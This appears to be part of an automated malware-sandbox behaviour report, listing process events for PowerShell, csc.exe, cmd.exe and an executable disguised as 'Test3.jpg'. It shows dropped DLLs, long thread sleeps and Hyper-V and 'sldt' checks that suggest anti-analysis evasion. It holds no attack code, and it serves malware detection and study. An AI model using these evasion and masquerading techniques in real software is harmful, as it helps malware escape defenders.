Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Code function: 18_2_00435DBD sldt word ptr [eax]

18_2_00435DBD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2397	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4699	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5364	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2433	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 589

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Test1.txt	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll	Jump to dropped file

Source: C:\Windows\System32\conhost.exe TID: 5924	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868	Thread sleep count: 2397 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868	Thread sleep count: 4699 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 4984	Thread sleep count: 48 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 4984	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 6356	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3848	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1492	Thread sleep count: 589 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 1492	Thread sleep time: -7068000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 21_2_08354AE0 GetSystemInfo,

21_2_08354AE0

Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-VMNetworkAdapter
Source: powershell.exe, 00000015.00000002.881477830.00000000059E6000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: fOC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1h
Source: powershell.exe, 00000015.00000002.881477830.00000000059E6000.00000004.00000001.sdmp	Binary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-VMNetworkAdapterExtendedAcl
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: fKC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1h
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Connect-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-VMNetworkAdapterExtendedAcl
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f(Set-VMNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f"Remove-VMNetworkAdapterExtendedAcl
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapterTeamMapping
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f(Set-VmNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f)Get-VMNetworkAdapterFailoverConfigurationiape+
Source: powershell.exe, 00000003.00000003.742621081.0000000008D10000.00000004.00000001.sdmp	Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\*
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Test-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr	Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VMNetworkAdapterRdma
Source: ModuleAnalysisCache.3.dr	Binary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapterAcl
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Rename-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapterVlan
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VMNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr	Binary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f(Add-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f)Get-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr	Binary or memory string: "Remove-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-VMNetworkAdapterAcl
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-VMScsiController
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VmNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f)Set-VMNetworkAdapterFailoverConfiguration
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f"Remove-VMNetworkAdapterTeamMapping
Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMScsiController
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapterRdma
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VMNetworkAdapterVlan
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VmNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Disconnect-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: "Remove-VMNetworkAdapterExtendedAcl
Source: ModuleAnalysisCache.3.dr	Binary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr	Binary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-VMNetworkAdapterAcl
